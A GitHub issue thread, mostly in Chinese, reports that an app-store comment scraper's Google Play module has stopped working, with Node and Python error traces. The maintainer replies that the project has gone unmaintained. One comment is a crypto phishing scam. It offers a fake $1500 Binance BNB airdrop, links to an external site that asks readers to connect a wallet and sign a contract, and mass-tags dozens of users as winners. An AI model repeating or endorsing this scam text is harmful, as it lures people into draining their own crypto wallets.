### ISSUE TITLE
googleplay程序报错了

### ISSUE THREAD

**Issue by DaDong-G** [wangwanjie/fetch-appstore-comments#1]
UnhandledPromiseRejectionWarning: Error: App not found (404) 就在几天前，googleplay 程序不能跑了，会报错

**Comment by wangwanjie** [comment]
> UnhandledPromiseRejectionWarning: Error: App not found (404) 就在几天前，googleplay 程序不能跑了，会报错

看提示应该是应用找不到了，可以检查下bundle id

**Comment by h9856** [comment]
/fetch-appstore-comments-master/app-store/splider.py", line 73, in main
    entry = data_feed['entry']

KeyError: 'entry'

**Comment by shcw** [comment]
我的也报错了

(node:50499) UnhandledPromiseRejectionWarning: Error: Error requesting Google Play:undefined
    at /Users/w/Documents/workspace/fetch-appstore-comments/google-play/node_modules/google-play-scraper/lib/utils/request.js:42:19
    at <anonymous>
    at process._tickCallback (internal/process/next_tick.js:189:7)
(node:50499) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)

**Comment by wangwanjie** [comment]
> 我的也报错了
> 
> (node:50499) UnhandledPromiseRejectionWarning: Error: Error requesting Google Play:undefined at /Users/w/Documents/workspace/fetch-appstore-comments/google-play/node_modules/google-play-scraper/lib/utils/request.js:42:19 at at process._tickCallback (internal/process/next_tick.js:189:7) (node:50499) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1)

很久没弄啦哈哈，辛苦自己根据日志排查一下

**Comment by BinIsGood** [comment]
确实用不了了。

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @PhenX, @keith, @WeavingCode, @cloudhan, @MouriNaruto, @ckcfcc, @1401199262, @Hab5, @nevinhappy, @juneJuly, @salisbury-espinosa, @OfcPeriwinkle, @duanguoxue, @vgmoose, @bluejumper, @Naville, @C47D, @Gnimuc, @zgx2012, @collins7184, @lu2xin, @BabyMelvin, @Kr4ken-9, @wxjia, @jjmerrill, @velveteer, @TheLogicMaster, @erinzm, @Sunbreaker, @sanmsen, @Archinowsk, @ntauth, @mgrossmann, @xrw67, @DaTrollMon, @davidliu88, @orgcontrib, @mihino89, @vampy, @dapengzi123, @bananaappletw, @theoparis, @Hikai, @it4ch1, @liuyu81, @zhangtaii, @Akiko97, @caniouff, @w0lfzhang, @ninjakool69

**Comment by theoparis** [comment]
wtf

**Comment by wangwanjie** [comment]
> 确实用不了了。

太久了，大概率是用不了了
